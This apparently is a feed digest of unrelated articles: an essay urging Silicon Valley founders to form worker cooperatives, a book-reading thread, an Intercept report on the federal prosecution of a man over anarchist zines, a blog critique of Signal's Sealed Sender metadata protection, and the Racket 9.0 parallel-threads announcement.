In principle, Silicon Valley startups could be incorporated as profit-sharing worker cooperatives. In this type of institution, all working members share the profit, which is democratically distributed. So if you join the co-op, you get a say, and you get profit shares. If you leave, you don’t anymore. The firm is collectively owned by its current working members.
Worker co-ops don’t hire in labour at a pre-agreed rental price. They do the opposite. They hire-in capital at a pre-agreed rental price (i.e., raise loan capital
not
equity capital). So capital, not labour, is merely another
ex ante
cost of production with no claim on the residual income of the firm.
1
In a democratic worker co-op, the principle of exchange is not violated, and no-one systematically exploits others and steals the value they (jointly) created. Clearly, this is a more lucrative deal for workers: profit-sharing is better than a wage. So why doesn’t this happen in the Valley? Why don’t lots of workers incorporate worker co-ops?
There are some carrots and a stick.
The carrot: join us, join us!
High-tech workers, especially those with in-demand skills, get more than wages, they get stock options.
A stock option bestows the right to purchase company shares at a (very low) predefined price. You have to work, normally for many years, before you can exercise that right. The aim is worker retention, and align incentives so workers are motivated to create profits “for the company”. Stock options, in a sense, automatically bestow the material benefits of trade unionism without the need to organise. Any worker is, of course, glad of this potential source of additional income.
But stock options, when exercised, are equity capital and confer (part) ownership of the firm: and, as we’ve seen, that fundamentally means participating in theft. Stock options, therefore, invite a section of the working class to join the elevated ranks of the capitalist class, and start exploiting others’ labour. (In practice, most stock options turn out worthless, since most new ventures fail. But it’s the hope that motivates).
In a small startup, as is common in Silicon Valley, it’s especially clear that the workers create all the added value. But the owner(s) appropriate it. So even the best educated minds start to notice. And this doesn’t seem entirely fair. So stock options function to muddy the waters, and paper over the inconvenient truth of exploitation.
So that’s one carrot, which pushes high-tech workers to sign-up to a capitalist firm. But there are more. If a group of workers decide to incorporate a new venture then, unless they are highly politically conscious and especially moral creatures, they will incorporate a capitalist firm, not a worker co-op. Why? Because you’ll definitely make more money by owning a firm, paying others wages, and keeping the profit to yourself.
Many startup founders in Silicon Valley know they’re ripping off the workers they employ. They might soothe their guilt by pointing out they offer stock options, or throw themselves into libertarianism, which conveniently coincides with their material interests. But it’s a fact that stock is normally heavily concentrated amongst a few early founders and venture capitalists. As time goes on, the founders contributions are eclipsed by the hired workers, and then it’s just exploitation all down the line. The company is bought-out, the founders get their initial advances and more, and therefore cash in, and make their millions. But, in almost all cases, they did not contribute to the creation of that value—they stole it from the workers they hired.
So the wage contract is sweetened by stock options. That works. But the contract is only voluntary if the workers have other options, if they have a choice. Do they?
The stick: reproduce capitalism or wither and die
But there are sticks too, which remove all choice, and prevent founders from incorporating worker co-operatives, even if they were sufficiently politically conscious to want to.
Silicon Valley is famous for its vibrant and extensive venture capital community. Plenty of capital swills around, continually searching, like Sauron’s great eye, for the latest hit company to fund, and therefore own and exploit the efforts and creativity of hundreds and thousands of workers.
Any venture capitalist, quite naturally, wants to maximise their returns. So, if faced with a choice between funding two companies, A and B, where A is a capitalist firm, and therefore offers equity in return for capital, whereas B is a worker co-op, and only offers interest repayments in return for capital, then the venture capitalist will always opt to fund A. No contest. Equity capital is strictly a better deal than loan capital. (And it’s not just more money, but also top-down dictatorial control of the company’s direction, and the working conditions and wage levels of employees. And being powerful is much more fun than being powerless. It’s great for the ego.)
Hence worker co-ops don’t get funded in Silicon Valley, and never will. So all those talented and creative workers, with good ideas for making things that people want, have no choice but to incorporate a capitalist firm, and begin sorting people into a class of owners, and a class of workers.
I witnessed an especially ugly example at an Silicon Valley business conference. An “Angel Investor” (someone who provides early seed capital) presented a talk about the criteria they apply when deciding which new ventures to invest in, and therefore what aspiring founders should do in order to maximise their chances of raising capital. A big factor, for the Angel, was that founders also raise money from friends and family, since “the desire to not disappoint loved ones is a great stimulant to hard work”. The Angel gave examples of “great stories” about teams they’d funded and the great returns made “by everybody”. At the close the Angel invited any founders in the audience to come and pitch their ideas to him—right there and then.
A line of about twenty or so young people formed in front of the Angel, desperate to get funding for their cherished ideas. And there it was, like a frozen scene from a perverted nativity: an anointed minority of one, with the monopoly on capital, and an unwashed majority, full of aspirations and creativity, lining up, cap-in-hand, to proffer the sacrifice of equity in their newborn, and surrender themselves to exploitation.
There was no choice, there is no choice: either submit to capital or watch your ideas wither and die. There are no other practical ways to raise significant capital. Real Angels don’t exist: those that ask only for their loan to be repaid, and not ownership of the firm; who reject the social relationship of equity capital, and therefore only invest in new ventures that incorporate as democratic worker-owned co-ops, so that all profit is shared, according to actual merit and contribution. If such fabled beings were present, the line before them would have been much, much longer.
There is no choice. Founders must incorporate capitalist firms, and must rent-in labour. And workers, who need income, don’t have the option to join a worker co-op. They must sign the wage contract. This isn’t voluntary, it’s coerced—by those with the monopoly on capital.
Silicon Valley culture celebrates venture capital, the Schumpeterian heroic entrepreneur, the dynamism of capitalism, and the gee-whiz technical and creative ideas of startup founders. But Silicon Valley repeatedly and continually reproduces exploitation, where some members of the firm own it, and others simply rent their labour to it. There’s zero innovation or disruption in this sphere. The Valley is a great engine, churning out new companies, day after day, which reproduce the division between an economic class that wins, and an economic class that loses.
Economic inequality has always been around. But notably, in the last 30 years or so, economic inequality, in the rich countries, has significantly increased. So we find people at the bottom struggling for food and shelter, while those at the top earn many years worth of the average salary while they sleep. The majority in the middle work hard yet lack savings, living their entire lives a few paychecks from destitution.
Things have got so bad that even mainstream discourse has shifted to reflect the new reality. We’re routinely told that millennials face low wages, poor quality jobs, high debt, and worse economic outcomes compared to their parents. People now accept that the political system is rigged by a rich elite who’ve captured the institutions of the nation state. And even the arch conservative world of academic economics talks about inequality. And that simply didn’t happen as recently as ten years ago.
Bourgeois thinkers struggle to explain the major cause of economic inequality, because to do requires thinking deeply about property relations and the issue of systematic exploitation. Instead, they prefer to think about unequal human capital endowments, taxation policies, interest and growth rates, the saving habits of workers, rising costs in child and health care, or the impact of automation. They’ll think about anything and everything except the actual reason for inequality.
Capitalist firms, in an important sense, are social machines, institutions that operate within the context of a market economy to “sort” individuals into different classes by means of the wage system. This sorting produces a very specific income and wealth distribution, which is peculiar to capitalism. Empirically, capitalist societies exhibit two distinct regimes: a lognormal distribution of wage income, and a Pareto distribution of profit income.
2
In any dynamic society, with a continual reallocation of the division of labour as new skills are demanded and other skills are automated or changed, we should expect some level of wage inequality due to mismatches between supply and demand in the labour market. Also, some jobs are terrible and dangerous, and people should get more for risking more. And some people really do contribute more within the workplace, and its OK if they get additional awards from their peers, if only to make sure they stick around. And some people actually need more, perhaps due to illness or disabilities or additional domestic responsibilities. All this is fine.
But, empirically, we see more than wage inequality. We see two distinct regimes. We see a majority earning wages, at the bottom of the scale, and a minority taking profits, at the top of the scale. Capitalist societies produce extreme inequalities where the top 10% or so take a big and disproportionate slice of the social pie.
And the reason is obvious, for those willing to look: the major cause of economic inequality is the wage system itself. The more workers a capitalist exploits the more profit they make. The more profit they make the more workers they can exploit. And capitalists in the super-rich bracket enjoy positive feedback effects. They can hardly lose. The economic game is entirely rigged in their favour. And, in this elevated state, they fall asleep, wake up the next morning, having earned more than workers do in their entire lifetimes.
In fact, the inequality between capitalists far exceeds the inequality between workers. The super-rich become astronomically rich as we bounce along the power-law tail of the Pareto distribution. The astronomically rich capture ostensibly democratic institutions, a phenomenon that is particularly clear in the USA, so that even mild social reforms are off the table. We’ve seen a collection of post-war policies, that once mitigated economic inequality, ditched in the last thirty years or so. This is why things have got even worse. Economic exploitation has increased.
Extreme economic inequality causes untold misery. At the top we see excessive and wasteful hyper-consumption. At the bottom, countless everyday struggles to live a dignified life. All the social ills of Silicon Valley, many of which are hidden in plain sight, are suffered mostly by the poorly paid, those with the least money. But inequality affects everyone. Societies with high Gini coefficients do worse on almost all measures of social well-being.
But it doesn’t have to be this way. Let’s imagine an impossible event, just for the sake of illustrating a point. Imagine that all the people we whispered to—in the cafes, the offices and homes of Silicon Valley—actually listened, and decided, right there and then, to abolish exploitation, and resolved, with great determination, to only ever incorporate worker co-ops, and only lend capital, and never demand equity, then—with one decisive and unlikely step—Silicon Valley would actually begin to do good. Because it’s at this precise pivotal moment—the birth of a new productive unit—that a society’s social relations of production either get reproduced, or changed. For once you start to abolish the wage contract, and the renting of human beings, you start to abolish economic classes and extreme income inequality. Wealth would then start to be shared more equitably, and fairly, upon the principle of exchange, according to actual contributions to production, and not specious paper claims. The Pareto upper-regime would lose its material basis, would totter and fall, and therewith all the power that goes with it, the ability to capture and corrupt democracies and run them for the benefit of a privileged and undeserving few. The majority of the population would have more, enjoy more, and live better.
You know, perhaps some really gifted entrepreneurs could figure out a way to export this culture, and good social outcomes, to the rest of the world.
Silicon Valley: bullshit progressivism
But sadly, as of today, that is a dream. And it’s not even a dream that’s widely shared. Silicon Valley does not see the connection between the kinds of firms it funds and creates, and the kinds of social ills that surround it.
But why single out Silicon Valley? What I’ve just described applies to capitalism in general.
Silicon Valley deserves especial opprobrium because the contradiction between its self-image and its reality is particularly stark. Silicon Valley desperately, desperately wants to view itself, and be seen as, socially progressive, enlightened, cutting-edge and, yes, utopian.
But despite the explosion of ideas and firms, and the progressive rhetoric, the core propositions of capitalism are completely untouched, inviolate. The coupling of radical technical experimentation, with extreme conservation of capitalist property relations, has been a very successful recipe for the Valley’s elite.
But the very startups that want to “change the world for the better” immediately reproduce economic exploitation: they separate human beings into a class that must rent their labour, and a class that appropriates the fruits of that labour; a class that is disciplined and must do as they are told in the workplace, and a class that disciplines and commands without democratic control. Every time an optimistic and earnest group of workers, with some great ideas, incorporate a startup and issue equity, any progressive content of those ideas are irreparably harmed.
Yet this is the specific evil that Silicon Valley does: it funnels the progressive content of technical utopianism (the increase in the forces of production) into institutions that exploit workers on a global scale, and contribute to extreme economic inequality (the existing social relations of production). Silicon Valley helps produce the dystopia we live in. It doesn’t change the world for the better. It makes it worse, every single day.
The narcissistic self-image of Valley culture contributes to its political backwardness. Some workers celebrate a victory when corporate HR departments commit to diversity in the workplace, or promise to address the gender pay gap. But these are easy concessions for capitalism, softballs, and the owners of your firm will happily accommodate you. Just don’t ask for bottom-up democracy in the workplace, or profit-sharing. Try it. You’ll get a very different response.
But that’s what I do wish for. And I’m talking to you now, fellow workers of the Valley! If you really want to do no evil, to be good, disrupt the status quo and make the world a better place, then
don’t create a capitalist firm
: it’s a top-down dictatorship, where the dictators steal the money. There’s nothing progressive about this kind of social institution. Founding such a startup is deeply unethical, represents institutionalised theft, and is a prime cause of diverse social ills.
Instead, use your talents to create democratic worker-owned cooperatives, based on equality among its working members; or help think of creative ways to solve the political problem of capitalists’ monopoly on capital.
3
Abolishing economic exploitation genuinely makes the world a better place. Reproducing it in your startup does not.
What are you reading and plan to read next?
Lobsters
lobste.rs
2025-11-23 11:25:03
Also what were you reading? What are you planning to read next? Feel free to ask questions about books you see in the post or comment!
I've finished reading the Memory Code by Lynne Kelly — and can highly recommend for unusual point of view on how illiterate society stores information. Still working...
Also what were you reading? What are you planning to read next? Feel free to ask questions about books you see in the post or comment!
I've finished reading the Memory Code by Lynne Kelly — and can highly recommend for unusual point of view on how illiterate society stores information. Still working through The Powerful Python by Aaron Maxwell, and it's not bad — it's just not that much of a time right now.
My plans for non-technical books: Ukrainian translation of Memory Called Empire by Arkady Martine (original was perhaps best scifi of my 2024, let's see how much they got into the translation). Also started Patrick Obrian's Master and Commander recommended by fellow lobsterer in similar thread years ago — great reading both in eink and audio!
The Feds Want to Make It Illegal to Even Possess an Anarchist Zine
Intercept
theintercept.com
2025-11-23 11:00:00
Daniel Sanchez is facing federal charges for what free speech advocates say is a clear attack on the First Amendment.
The post The Feds Want to Make It Illegal to Even Possess an Anarchist Zine appeared first on The Intercept....
A detail view of the badge worn by Matthew Elliston during an ICE hiring event on Aug. 26, 2025, in Arlington, Texas.
Photo: Ron Jenkins/Getty Images
Federal prosecutors have
filed a new
indictment
in response to a July 4 noise demonstration outside the Prairieland ICE detention facility in Alvarado, Texas, during which a
police officer was shot
.
There are numerous problems with the indictment, but perhaps the most glaring is its inclusion of charges against a Dallas artist who wasn’t even at the protest. Daniel “Des” Sanchez is accused of transporting a box that contained “Antifa materials” after the incident, supposedly to conceal evidence against his wife, Maricela Rueda, who was there.
But the boxed materials aren’t Molotov cocktails, pipe bombs, or whatever MAGA officials claim “Antifa” uses to wage its imaginary war on America. As prosecutors laid out in the July
criminal complaint
that led to the indictment, they were zines and pamphlets. Some contain controversial ideas — one was titled “Insurrectionary Anarchy” — but they’re fully constitutionally protected free speech. The case demonstrates the administration’s intensifying efforts to
criminalize left-wing activists
after Donald Trump announced in September that he was
designating
“Antifa” as a “major terrorist organization” — a legal designation that doesn’t exist for domestic groups — following the
killing
of Charlie Kirk.
Sanchez was first
indicted
in October on charges of “corruptly concealing a document or record” as a standalone case, but the new indictment merges his charges with those against the other defendants, likely in hopes of burying the First Amendment problems with the case against him under prosecutors’ claims about the alleged shooting.
It’s an escalation of a familiar tactic. In 2023, Georgia prosecutors listed “zine” distribution as part of the conspiracy charges against 61 Stop Cop City protesters in a
sprawling RICO indictment
that didn’t bother to explain how each individual defendant was involved in any actual crime. I wrote back then about my concern that this wasn’t just sloppy overreach, but also a
blueprint for censorship
. Those fears have now been validated by Sanchez’s prosecution solely for possessing similar literature.
Photos of the zines Daniel Sanchez is charged with “corruptly concealing.”
Photo: U.S. District Court, Northern District of Texas
There have been other warnings that cops and prosecutors think they’ve found a constitutional loophole — if you can’t punish reporting it, punish transporting it. Los Angeles journalist Maya Lau is suing the LA County Sheriff’s Department for secretly investigating her for conspiracy, theft of government property, unlawful access of a computer, burglary, and receiving stolen property.
According to her attorneys
, her only offense was
reporting
on a list of deputies with histories of misconduct for the Los Angeles Times.
If you can’t punish reporting it, punish transporting it.
It’s also reminiscent of the Biden administration’s
case
against right-wing outlet Project Veritas for possessing and transporting Ashley Biden’s diary, which the organization
bought from a Florida woman
later convicted of stealing and selling it. The Constitution
protects
the right to publish materials stolen by others — a right that would be meaningless if they couldn’t possess the materials in the first place.
Despite the
collapses
of the
Cop City prosecution
and the Lau investigation — and its own dismissal of the Project Veritas case — the Trump administration has followed those dangerous examples,
characterizing
lawful activism and ideologies as
terrorist
conspiracies (a strategy Trump allies also
floated
during this first term) to seize the power to prosecute pamphlet possession anytime they use the magic word “Antifa.”
That’s a chilling combination for any journalist, activist, or individual who criticizes Trump.
National security reporters
have long dealt with the
specter of prosecution
under the archaic
Espionage Act
for merely obtaining government secrets from sources, particularly after the Biden administration extracted a
guilty plea
from WikiLeaks founder
Julian Assange
. But the rest of the press — and everyone else, for that matter — understood that merely possessing written materials, no matter what they said, is not a crime.
Guilt by Literature
At what point does a literary collection or newspaper subscription become prosecutorial evidence under the Trump administration’s logic? Essentially, whenever it’s convenient. The vagueness is a feature, not a bug. When people don’t know which political materials might later be deemed evidence of criminality, the safest course is to avoid engaging with controversial ideas altogether.
The slippery slope from anarchist zines to conventional journalism isn’t hypothetical, and we’re already sliding fast. Journalist
Mario Guevara
can tell you that from El Salvador, where he was deported in a clear case of retaliation for livestreaming a No Kings protest. So can Tufts doctoral student
Rümeysa Öztürk
, as she awaits deportation proceedings for
co-writing an opinion piece
critical of Israel’s wars that the administration considers evidence of support for terrorism.
At least two journalists lawfully in the U.S. —
Ya’akub Ira Vijandre
and
Sami Hamdi
— were nabbed by ICE just last month. The case against
Vijandre
is partially based on his criticism of prosecutorial overreach in the
Holy Land Five
case and his liking social media posts that quote Quranic verses, raising the question of how far away we are from someone being indicted for transporting a Quran or a news article critical of the war on terror.
Sanchez’s case is prosecutorial overreach stacked on more prosecutorial overreach. The National Lawyers Guild
criticized
prosecutors’ tenuous dot-connecting to justify holding 18 defendants responsible for one gunshot wound. Some defendants were also charged with
supporting
terrorism due to their alleged association with “Antifa.” Anarchist zines were
cited
as evidence against them, too.
Sanchez was charged following a search that ICE proclaimed on
social media
turned up “literal insurrectionist propaganda” he had allegedly transported from his home to an apartment, noting that “insurrectionary anarchism is regarded as the most serious form of domestic (non-jihadi) terrorist threat.” The tweet also said that Sanchez is a green card holder granted legal status through the Deferred Action for Childhood Arrivals program.
The indictment claims Sanchez was transporting those materials to conceal them because they incriminated his wife. But how can possession of literature incriminate anyone, let alone someone who isn’t even accused of anything but being present when someone else allegedly fired a gun? Zines aren’t contraband; it’s
not illegal
to be an anarchist or read about anarchism. I don’t know why Sanchez allegedly moved the box of documents, but if it was because he (apparently correctly) feared prosecutors would try to use them against his wife, that’s a commentary on prosecutors’ lawlessness, not Sanchez’s.
Violent rhetoric is subject to punishment only when it constitutes a “
true threat
” of imminent violence. Even then, the speaker is held responsible, not anyone merely in possession of their words.
Government prosecutors haven’t alleged the “Antifa materials” contained any “true threats,” or any other category of speech that falls outside the protection of the First Amendment. Nor did they allege that the materials were used to plan the alleged actions of protesters on July 4 (although they did allege that the materials were “anti-government” and “anti-Trump”).
We don’t need a constitutional right to publish (or possess) only what the government likes.
Even the aforementioned “
Insurrectionary Anarchy: Organizing for Attack
” zine, despite its hyperbolic title, reads like a think piece, not a how-to manual. It advocates for tactics like rent strikes and squatting, not shooting police officers. Critically, it has nothing to do with whether Sanchez’s wife committed crimes on July 4.
Being guilty of possessing literature is a concept fundamentally incompatible with a free society. We don’t need a constitutional right to publish (or possess) only what the government likes, and the “anti-government” literature in Sanchez’s box of zines is exactly what the First Amendment protects. With history and leaders like Vladimir Putin and Viktor Orbán as a guide, we also know it’s highly unlikely that Trump’s censorship crusade will stop with a few radical pamphlets.
The Framers Loved Zines
There’s an irony in a supposedly conservative administration treating anti-government pamphlets as evidence of criminality. Many of the publications the Constitution’s framers had in mind when they authored the First Amendment’s press freedom clause bore far more resemblance to Sanchez’s box of zines than to the output of today’s mainstream news media.
Revolutionary-era America was awash in highly opinionated, politically radical literature. Thomas Paine’s “Common Sense” was designed to inspire revolution against the established government. Newspapers like the Boston Gazette printed inflammatory
writings
by Samuel Adams
and others
urging the colonies to prepare for war after the Coercive Acts. The Declaration of Independence itself recognized the right of the people to rise up. It did not assume the revolution of the time would be the last one.
One might call it “literal insurrectionist propaganda” — and some of it was probably transported in boxes.
The framers enshrined press freedom not because they imagined today’s professionally trained journalists maintaining careful neutrality. They protected it because they understood firsthand the need for journalists and writers who believed their government had become tyrannical to espouse revolution.
For all their many faults, the framers were confident enough in their ideas that they were willing to let them be tested. If the government’s conduct didn’t call for radical opposition, then radical ideas wouldn’t catch on. It sure looks like the current administration doesn’t want to make that bet.
Recently I got a friend to finally join me on Signal. He asked something about whether or not Signal is truly secure and private, like if it was safe from US government surveillance. I told him:
“Well, it’s end-to-end encrypted, so they don’t know
what
we’re talking about, but they definitely know that we’re talking to each other.”
I said that because Signal uses our phone numbers as ID’s. So, Signal would know that Phone Number A is talking to Phone Number B, and if they can figure out that Phone Number A belongs to me, and Phone Number B belongs to my buddy (usually not too hard to figure out with some OSINT or the assistance of certain governments), then Signal would know that my buddy and I are talking, even if they don’t know what we’re talking about.
This is a limit of end-to-end encryption, which I’ve
talked about before
. End-to-end encryption provides confidentiality of data, but not anonymity or protection from identifying metadata.
However, I was surprised when my friend got back to me saying that, no, Signal actually doesn’t know who’s talking to who because of this feature called “
Sealed Sender
“.
“Woah! Seriously?! Cool!”
I thought. But then I started reading how Sealed Sender actually works, according to none other than Signal themselves, and I found that this feature is very technically complex, and
totally useless
.
ʕ ಠ ᴥಠ ʔ: Woah! Seriously?! Not cool!
One-way anonymity for two-way communications
While Sealed Sender is pretty complicated under the hood, the result of it is one-way anonymity. That means that, when Phone Number A sends a message to Phone Number B, Signal won’t know that the message is coming from Phone Number A and will only know that the message is to be delivered to Phone Number B.
It does this in a way that’s very similar to snail mail without a return address: the letter inside the mail envelope might tell the recipient who the sender is, but the mail envelope itself tells the post office only who the recipient is so that it can be delivered to them. If the post office doesn’t or can’t open the envelope to read the letter itself, then they don’t know who the sender is. Later on, when the recipient wants to send a reply to the sender, they can do the same thing.
ʕ·ᴥ·ʔ: Hm, okay. This kind of sounds like it’s anonymous.
Well, yes, it sort of is, but only when there’s only one message to be sent. The problem comes up when multiple messages are being sent back-and-forth like this.
Sticking with the snail mail analogy, what happens when two pen pals keep sending mail to each other from their homes without including return addresses in their envelopes? The postal service might not know who exactly is sending each piece of mail but, over time, they would know that
Address A in Lower Manhattan
, New York, keeps on getting one-way mail from the post office in 3630 East Tremont Avenue,
the Bronx
, New York; and
Address B in the Bronx
keeps on getting one-way mail from the post office in 350 Canal Street,
Lower Manhattan
.
ʕ´•ᴥ•`ʔ: Oh. Then the postal service would be pretty sure that whoever is living at Address A and Address B are talking to each other.
Exactly. That’s the limitation of one-way anonymity:
it works only one way!
Once you start doing two-way communications, with replies going back-and-forth, then one-way anonymity is useless.
Two pieces of metadata
With multiple messages being sent back-and-forth over time, and with Signal knowing
only the recipient phone number
of each message, it would be pretty hard for Signal to figure out who’s talking to who when their servers are getting thousands of messages every second from different senders, with each message being conveyed to thousands of different recipients. But, Signal doesn’t know
only the recipient phone number
of each message; they also know the IP address of each sender. And this is where the snail mail analogy fails, because IP addresses are
much more specific
than post offices.
Signal messages, as we all know, get sent over the internet, and the internet sends data around using IP addresses. Sealed Sender only protects the sender’s phone number; it does not protect the sender’s IP address. So, if you’re sending Signal messages to your super secret pen pal from your house, and you aren’t using a VPN or Tor, then Signal knows that the messages being sent to your pen pal’s phone number are coming from your house’s IP address (not a post office, your house).
Even if you are using some method of masking your real IP address, you still have to use
some
IP address in order to communicate on the internet, and Signal will see that
the same IP address keeps on sending messages to the same phone number
. That’s enough to easily figure out that all of these different messages meant for the recipient are coming from the same sender. Sure, maybe you’re using the IP address of a VPN server or Tor exit node that has other Signal users sending messages at the same time, but that’s extremely unlikely. More likely: Even when you use a VPN or Tor, Signal can easily tell that every Sealed Sender message you’re sending to your pen pal are coming from one person: you.
And if your pen pal replies, the reply will have his IP address on it (the same IP address Signal sent your messages to) and your phone number on it. And then, when you want to receive the reply, you have to connect to Signal’s servers using, again, your IP address (the same IP address you used to send your messages to your pen pal earlier). Just like that, with two messages, Signal figured out which phone number (yours) is talking to which other phone number (your pen pal’s). If they ever decide to try and figure out who own these two phone numbers, they could ask your telecoms, or simply search Facebook and Twitter.
You can’t avoid using IP addresses on the internet; they are a necessity on the internet. But you can use a VPN or Tor to mask your real IP address with a fake one that’s not tied to your identity.
But you can’t do that with phone numbers.
A phone number is either tied to your identity or it isn’t; there is no masking possible, unless you use a service like
MySudo
which
isn’t available for most of us
(US and Canada only, as of this writing). If you’re fortunate enough to be able to buy a prepaid SIM without ID, then great, all you and your pen pal have to do is buy some SIM cards that aren’t tied to your identities. If buying a prepaid SIM without ID ain’t an option, then your phone number has to be tied to your identity, and Signal can use these unmasked phone numbers, in combination with masked or unmasked IP addresses, to figure out who’s talking to who,
despite Sealed Sender’s promises
, as long as there’s a two-way conversation going on.
Which brings up an interesting question:
Why does Signal require phone numbers?
ʕ´•ᴥ•`ʔ: Hey, that is an interesting question…
Signal works over the internet, and the internet requires IP (internet protocol) addresses in order to figure out where a message should go. But sending messages over the internet
does not
require phone numbers; that’s a requirement when using SMS or cellular calls or mobile data,
but not for using the internet
. And yet, the “privacy-protecting” Signal app requires you to use a phone number to send and receive messages…
ʕ⚆ᴥ⚆ʔ: Hmmmm…
It’s always a two-way street
It gets worse. I keep repeating this:
two-way communication
. Sealed Sender doesn’t work with
two-way communication
. But, I’ve kind of been lying. The truth is:
Signal already knows which phone numbers have been talking to which, even with Sealed Sender and only one-way communication.
ʕ ಠ ᴥಠ ʔ: What?!
Do these check marks look familiar to you? (Forgive the pixelation.)
ʕ·ᴥ·ʔ: Hm, yeah. Aren’t they the check marks that show up for at least a second whenever I send a Signal message? This is what’s shown after the lone check mark, and before they both turn white to indicate that my message was read, right?
That’s right. The lone check mark indicates that your Signal message was sent to Signal’s servers, these two check marks above indicate that your Signal message has been delivered to the recipient, and the two white check marks indicate that the recipient has read your Signal message.
Now, the thing about the two check marks above is that your Signal app only shows them when your phone has received what’s called a “delivery receipt” from the recipient’s phone. Whenever your pen pal gets a message from you, their Signal app sends a delivery receipt from their phone, through Signal’s servers, to your phone. Their Signal app does this
automatically and instantly
, and neither of you can turn it off. You can turn off read receipts (the two white check marks) and typing indicators, but you can’t turn off the
very first reply
: delivery receipts.
The delivery receipt is –
ahem
– also “protected” using Sealed Sender, but what was it that I’ve been saying this whole time is wrong with Sealed Sender?
ʕ·ᴥ·ʔ: It works only one-way…
ʕ • ᴥ • ʔ: It works only one-way…
ʕ º ᴥ º ʔ: …and the delivery receipt automatically makes it two-way.
Exactly. And you can’t turn it off. Go figure why.
Some alternatives and a work in progress
So if you can’t trust Signal, who can you trust? Well, if all you need is a private text-based communication channel that won’t falsely advertise their privacy guarantees to you,
Proton Mail
and
Tutanota
(now called Tuta) are pretty good. But if you want private voice-based communication, then that’s gonna’ be a problem. WhatsApp is even worse than Signal, Telegram is
even worse than WhatsApp
, Wire requires an email address to use it (another unnecessary requirement), and most of the rest can’t be trusted because they aren’t open-source.
You could use
Jitsi
for voice communications, but you’d have to use a separate service for text communications. You could use
Matrix
for both text and voice, but that’s a software and communication protocol, so you’d have to set up your own server running it. You could use
Element
, which runs Matrix servers, but you’d have to
trust Amazon and Cloudflare
with your metadata, making this a rather messy solution to a privacy problem.
What that leaves us with is a single service that is still a work in progress:
SimpleX
. It asks for no global identifiers like phone numbers or email addresses. It at least tries, unlike Signal,
to make sure that it doesn’t know who’s talking to who
. It does this with the use of proxies that you randomly send your messages through to get to your recipient (the
technical details
of which are too complicated to get into here). Of course it is
open-source
and end-to-end encrypted, otherwise I wouldn’t be mentioning it. It even goes so far as to
allow you to use Tor
with it, or any
SOCKS
proxy. It’s pretty cool, actually; the most technically amazing communications platform I’ve ever seen.
But, it ain’t perfect. It’s kinda’ slow, and messages sometimes don’t come in in the right order or don’t come in at all. Voice calls are… iffy, particularly when using Tor. It is still a young, developing project, though it has been making great strides in improving itself, including
getting a security audit
.
Time will tell how it turns out, but at least I can say one thing: we’ve got a viable alternative.
Hey, Kuma!
ʕ •̀ᴥ•́ ʔ: Where have you been for the past 11 months?!
I actually started writing this article months ago and then got busy again.
ʕ ಠ ᴥಠ ʔ: Well at least visit me with some tips and tricks every once in a while.
I’ll try, buddy, but real life comes first before imaginary friends.
ʕ •̀ᴥ•́ ʔ: I know I’m imaginary, but are your subscribers?
I dunno’. Maybe they should give me a hint by signing up below!
Or don’t; my RSS feed’s in the site menu. Unlike Signal, I don’t need you to sign up with a global identifier.
posted by Matthew Flatt, Ryan Culpepper, Robby
Findler, Gustavo Massaccesi, and Sam Tobin-Hochstadt
With the version 9.0 release, Racket includes support for
shared-memory threads that can take advantage of multicore hardware
and operating-systems threads to run in parallel—
not merely
concurrently with other Racket threads, as was the case in versions before 9.0.
Creating a thread that runs in parallel is as simple as adding a
flag to the call to
thread
.
To see the effect, try first putting the following code into a file named
"thread.rkt"
and running
racket thread.rkt
on the
command line:
Racket will find many square roots (tweak
N
to match your
machine), but will keep only one core of your CPU busy. Using
time
in the shell reports “CPU” (possibly broken into
“user” and ‘system”) and “real” times that are similar. To
use two cores, add
#:pool
'
own
to the
thread
call:
In this case, real time should be about half of CPU time, while CPU
should remain similar to before. In other words, the parallel version
runs twice as fast. On the machine used
below
:
concurrent
parallel
×1
1011 msec real
979
msec CPU
10
msec CPU for GC
×2
517 msec real
1021
msec CPU
13
msec CPU for GC
Passing the new
#:pool
argument
creates a
parallel thread
; create pools via
make-parallel-thread-pool
to have a group of threads share
processor resources or just pass
'
own
to have the
new thread exist in its own
parallel thread pool
.
As a further addition to
thread
, a
#:keep
'
result
argument keeps the result of
thunk
when it returns, instead
of discarding the result. Retrieve a thread’s result with
thread-wait
. So, for example,
runs
thunk
in parallel
to other Racket threads, blocks the current Racket thread (while
allowing other Racket threads to continue, even non-parallel ones),
and then returns the result value(s) when
thunk
completes.
To maintain backwards compatibility, the
thread
function still creates a
coroutine
thread
by default, which is a lightweight thread that is preemptively
scheduled and whose execution is interleaved with other coroutine
threads. For many tasks that need the organizational benefits of
concurrency without the performance benefits of parallelism, such as
when managing GUI interactions or orchestrating remote processes,
coroutine threads are still the best abstraction. Coroutine threads
can use
#:keep
'
result
, too.
Racket’s full thread API works with parallel threads. Follow the links
from the
thread
documentation to see more details on thread
pools and for more interesting uses. Of course, just because you put
tasks in parallel threads doesn’t mean that they always speed up,
as sharing and communication can limit parallelism. Racket’s
future
visualizer
works for parallel threads, tho, and it can help you
understand where synchronization in a task limits parallelism.
Also, adding parallelism to Racket potentially creates trouble for existing
libraries that were not designed to accommodate parallelism. We expect
problems to be rare, however.
We’ll explore the performance details and explain why we expect most
programs will continue to work well later in this post, but first:
Racket’s Road to Parallelism
Running threads in parallel counts as news in 2025?! Well, it has been a long
road.
Racket’s implementation started in the mid-1990s, just as a wave of
enthusiasm for parallel programming was winding down. Although
operating systems by that point consistently supported within-process
threads, computers with multiprocessors were not commonly available.
Many language runtime systems from the same era—
including Python,
Ruby, and OCaml—
took advantage of the internal simplicity of a
single-threaded runtime system while offering constructs for
concurrency
at the language level. Racket has always
included threads for concurrency, and it was an early adopter of
Concurrent ML
’s
abstractions for managing concurrency well. But an absence of
parallelism was deeply baked into the original implementation.
Over time, to provide support for parallelism, we added
places
and
futures
to Racket. Places support
coarse-grained parallelism through a message-passing API, effectively
running parallel instances of the virtual machine within a single
operating-system process; limited sharing makes the implementation
easier and safer than arbitrary sharing between parallel threads.
Futures provide fine-grained parallelism for restricted computations;
a future blocks when it tries to perform any operation that would be
difficult for the runtime system to complete safely in parallel.
Places and futures are both useful, and they avoid some pitfalls of
shared-memory threads. Still, fitting a parallel task into futures or
places usually requires special effort.
Meanwhile, single-threaded execution was only one of the problems with
the original Racket (a.k.a. PLT Scheme) implementation. To address
larger problems with the implementation and to improve performance, we
started in 2017
rebuilding
Racket on top of Chez Scheme
. Rebuilding took some time, and we only
gradually deprecated the old “BC” implementation in favor of the new
“CS” implementation, but the transition is now complete. Racket BC
is still maintained, but as of August 2025, we distribute only Racket
CS builds at
https://download.racket-lang.org
.
